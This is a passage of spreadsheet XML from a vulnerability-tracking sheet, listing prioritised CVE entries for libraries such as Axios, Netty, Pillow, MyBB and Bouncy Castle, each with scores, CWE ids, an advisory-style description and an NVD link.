          <t>A flaw was found in the Data Science Pipelines Operator (DSPO). The operator's ClusterRole, which defines its permissions, includes extensive privileges beyond what is necessary for its operation. These excessive permissions, such as the ability to execute commands within pods and manage cluster-wide roles, could be exploited. If the DSPO pod were compromised, an attacker could leverage these privileges to gain full administrative control over the entire Kubernetes cluster.</t>
        </is>
      </c>
      <c r="M415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18608</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3505</t>
        </is>
      </c>
      <c r="C416" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E416" s="5" t="inlineStr"/>
      <c r="F416" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G416" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling, Uncontrolled Resource Consumption vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpg on all (pg modules).
 This vulnerability is associated with program files AEADEncDataPacket.Java, BcAEADUtil.Java, JceAEADUtil.Java, OperatorHelper.Java.
This issue affects BC-JAVA: from 1.74 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3505</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40192</t>
        </is>
      </c>
      <c r="C417" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E417" s="5" t="inlineStr"/>
      <c r="F417" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G417" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H417" s="5" t="inlineStr">
        <is>
          <t>python:pillow</t>
        </is>
      </c>
      <c r="I417" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409, CWE-770</t>
        </is>
      </c>
      <c r="L417" s="5" t="inlineStr">
        <is>
          <t>Pillow is a Python imaging library. Versions 10.3.0 through 12.1.1 did not limit the amount of GZIP-compressed data read when decoding a FITS image, making them vulnerable to decompression bomb attacks. A specially crafted FITS file could cause unbounded memory consumption, leading to denial of service (OOM crash or severe performance degradation). If users are unable to immediately upgrade, they should only open specific image formats, excluding FITS, as a workaround.</t>
        </is>
      </c>
      <c r="M417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40192</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41674</t>
        </is>
      </c>
      <c r="C418" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E418" s="5" t="inlineStr"/>
      <c r="F418" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G418" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L418" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim without any escaping or validation. When these fields are set programmatically to attacker-controlled strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is terminated early and arbitrary markup appears outside it. This issue has been patched in versions @xmldom/xmldom versions 0.9.10 and 0.8.13.</t>
        </is>
      </c>
      <c r="M418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41674</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44494</t>
        </is>
      </c>
      <c r="C419" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E419" s="5" t="inlineStr"/>
      <c r="F419" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G419" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H419" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I419" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-441, CWE-915</t>
        </is>
      </c>
      <c r="L419" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0.</t>
        </is>
      </c>
      <c r="M419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44494</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45115</t>
        </is>
      </c>
      <c r="C420" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E420" s="5" t="inlineStr"/>
      <c r="F420" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G420" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Buddy/Ignore component does not sanitize usernames correctly, allowing attackers to perform JavaScript code injection through a specially crafted username. The User CP Buddy/Ignore list and the Select Buddies list in Private Messages pass usernames through htmlspecialchars_uni(), which may leave single quotes unescaped. The payload is triggered when a victim chooses Yes in Please Confirm while removing the username in usercp.php, or selects the username through the onclick handler in the xmlhttp.php Select Buddies popup. The uniquely identifying implementation details include Private Messages Select Buddies list, and unescaped single quotes. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45115</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45116</t>
        </is>
      </c>
      <c r="C421" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E421" s="5" t="inlineStr"/>
      <c r="F421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G421" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L421" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the user datahandler does not properly validate checkbox and multiselect profile field types, resulting in stored JavaScript code injection. UserDataHandler::verify_profile_fields() only performs the specialized validation when is_array($profile_fields[$field]) is true. A non-array profile_fields[fidX] value instead of the expected profile_fields[fidX][] shape falls through to generic text handling and is stored without verification. The affected value is then rendered directly by member.php and inc/functions_post.php rather than processed by the MyCode parser. The uniquely identifying implementation details include inc/datahandlers/user.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45116</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47683</t>
        </is>
      </c>
      <c r="C422" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E422" s="5" t="inlineStr"/>
      <c r="F422" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G422" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L422" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, the bufferAllocLimit enforcement in lib/setup-sandbox.js does not cover Buffer.concat(list, totalLength) or Buffer.from(arrayLike) with an attacker-controlled length, allowing sandbox code to perform large synchronous host external-memory allocations that bypass the configured cap and can exhaust the host process. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47683</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47879</t>
        </is>
      </c>
      <c r="C423" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E423" s="5" t="inlineStr"/>
      <c r="F423" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G423" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H423" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_cloud_gateway</t>
        </is>
      </c>
      <c r="I423" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L423" s="5" t="inlineStr">
        <is>
          <t>Spring Cloud Gateway JsonToGrpcGatewayFilterFactory allows arbitrary Spring Resource locations for defining the proto descriptor.
Spring Cloud Gateway 5.0.0 - 5.0.2
Spring Cloud Gateway 4.3.0 - 4.3.5
Spring Cloud Gateway 4.0.0 - 4.2.9
Spring Cloud Gateway 3.1.13 and earlier</t>
        </is>
      </c>
      <c r="M423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47879</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48006</t>
        </is>
      </c>
      <c r="C424" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E424" s="5" t="inlineStr"/>
      <c r="F424" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G424" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H424" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I424" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="L424" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the RedisArrayAggregator handler permanently leaks pooled direct-memory buffers when a Redis pipeline connection closes before a RESP array aggregate completes. The handler retains child messages in per-handler state (`depths` field) but defines no `channelInactive`, `handlerRemoved`, or `exceptionCaught` method to release them when the pipeline tears down. Because the leaked buffers are slices of `PooledByteBufAllocator` chunks, they prevent those chunks from being returned to the JVM-wide direct-memory pool. Repeated connection churn by any network peer monotonically drains this shared pool, eventually causing allocation failures on all Netty channels in the process. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48006</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48026</t>
        </is>
      </c>
      <c r="C425" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E425" s="5" t="inlineStr"/>
      <c r="F425" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G425" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L425" s="5" t="inlineStr">
        <is>
          <t>lakeFS is an open-source tool that transforms object storage into a Git-like repositories. Prior to version 1.81.1 of the open source edition and 1.84.0 of the enterprise edition, lakeFS Web UI renders markdown files from repository objects without sanitizing the resulting HTML. A user with write access to any repository branch can commit a `.md` object containing arbitrary HTML/JavaScript. Any other user who opens that object, or who navigates to a repository or directory containing a malicious `README.md`, executes the attacker-supplied script in their own authenticated session. lakeFS fixes the issue in v1.81.1 and lakeFS Enterprise fixes the issue in in v1.84.0. Enterprise customers using older versions can temporarily disable Markdown rendering by adding YAML to their config. No workaround exists for OSS release. Users are advised to upgrade to the latest version for both lakeFS and lakeFS-Enterprise.</t>
        </is>
      </c>
      <c r="M425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48026</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49478</t>
        </is>
      </c>
      <c r="C426" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E426" s="5" t="inlineStr"/>
      <c r="F426" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G426" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L426" s="5" t="inlineStr">
        <is>
          <t>Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Versions through 1.8.5 improperly follow cross-host redirects and attach Kubernetes ServiceAccount tokens during OIDC discovery, allowing a malicious or compromised issuer to perform blind SSRF, substitute and cache malicious JWKS keys, or disclose ServiceAccount tokens to external hosts. Version 1.8.6 blocks cross-host redirects, restricts token injection, and restricts local token loading. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49478</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54347</t>
        </is>
      </c>
      <c r="C427" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E427" s="5" t="inlineStr"/>
      <c r="F427" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G427" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L427" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.8, DNS TXT record content accepted by lib/Froxlor/Api/Commands/DomainZones.php can contain HTML special characters, lib/Froxlor/UI/Callbacks/Text.php returns the content from Text::wordwrap without HTML escaping, and templates/Froxlor/table/table.html.twig renders the callback result with the raw filter. An authenticated customer with DNS editor access can store JavaScript-bearing content in a TXT record. When an administrator views the affected domain's DNS configuration, the payload executes automatically in the administrator's browser session, which can expose session data or perform privileged panel actions. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54347</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54722</t>
        </is>
      </c>
      <c r="C428" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E428" s="5" t="inlineStr"/>
      <c r="F428" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G428" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr">
        <is>
          <t>CWE-76</t>
        </is>
      </c>
      <c r="L428" s="5" t="inlineStr">
        <is>
          <t>DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.0.4, is_url_safe in src/helpers.ts strips the @ userinfo delimiter with remove_at_symbol_in_string before new URL parses the URL, allowing an attacker-controlled URL to bypass internal-IP validation and cause a client using the original URL to reach an internal service. This issue is fixed in version 1.0.4.</t>
        </is>
      </c>
      <c r="M428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54722</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54729</t>
        </is>
      </c>
      <c r="C429" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E429" s="5" t="inlineStr"/>
      <c r="F429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G429" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr">
        <is>
          <t>DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.0.5, is_url_safe can treat localhost as safe when DNS resolver 1.1.1.1 returns NXDOMAIN because dns.resolve4 yields no address and no dns.lookup fallback occurs, allowing server-side request forgery. This issue is fixed in version 1.0.5.</t>
        </is>
      </c>
      <c r="M429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54729</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55100</t>
        </is>
      </c>
      <c r="C430" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E430" s="5" t="inlineStr"/>
      <c r="F430" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G430" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr">
        <is>
          <t>CWE-23, CWE-74</t>
        </is>
      </c>
      <c r="L430" s="5" t="inlineStr">
        <is>
          <t>hashi-vault-js is a Node.js module for interacting with the HashiCorp Vault API. Prior to 0.5.2, src/Vault.js concatenates unencoded identifier values including name, username, group, role, and version into Vault request paths and query strings instead of using encodeURIComponent() and URLSearchParams, allowing path traversal and query parameter injection. This issue is fixed in version 0.5.2.</t>
        </is>
      </c>
      <c r="M430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55100</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="C431" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E431" s="5" t="inlineStr"/>
      <c r="F431" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G431" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59643</t>
        </is>
      </c>
      <c r="C432" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E432" s="5" t="inlineStr"/>
      <c r="F432" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G432" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H432" s="5" t="inlineStr">
        <is>
          <t>bouncycastle:bc-java, bouncycastle:bcpg-fips</t>
        </is>
      </c>
      <c r="I432" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L432" s="5" t="inlineStr">
        <is>
          <t>In Bouncy Castle for Java before 1.85, OpenPGP inline-signature policy failures silently ignored. This issue also affects Bouncy Castle for Java FIPS (BC-FJA) before bcpg-fips 2.0.13.</t>
        </is>
      </c>
      <c r="M432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59643</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61556</t>
        </is>
      </c>
      <c r="C433" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E433" s="5" t="inlineStr"/>
      <c r="F433" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G433" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr">
        <is>
          <t>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. From 10.26.0 until 10.27.1, the strip_html filter in src/filters/html.ts can enter an infinite loop when an input string contains &lt;, includes at least one preceding character, and has no later &gt;. In strip_html, the search for the next opener advances lt while the loop index remains unchanged when the closer search returns -1, and the equality-only stall guard does not exit because the loop index is less than lt. Reprocessing the same state indefinitely blocks template rendering and can cause denial of service with an input as short as a&lt;. This issue is fixed in version 10.27.1.</t>
        </is>
      </c>
      <c r="M433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61556</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62243</t>
        </is>
      </c>
      <c r="C434" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E434" s="5" t="inlineStr"/>
      <c r="F434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G434" s="5" t="inlineStr">
        <is>
          <t>java, openssl, .net</t>
        </is>
      </c>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr">
        <is>
          <t>2026-08-22</t>
        </is>
      </c>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr">
        <is>
          <t>Netty (io.netty:netty-handler) versions from 4.2.0.Final through 4.2.16.Final and versions through 4.1.136.Final disable TLS hostname verification on the SslProvider.OPENSSL client path when a plain (non-extended) X509TrustManager is used and Unsafe-based trust-manager wrapping is unavailable (Java 25+). In this configuration the OpenSSL client does not perform hostname verification, allowing a man-in-the-middle attacker to present a certificate issued for a different hostname that is accepted without validation. Fixed in 4.2.17.Final and 4.1.137.Final.</t>
        </is>
      </c>
      <c r="M434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62243</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
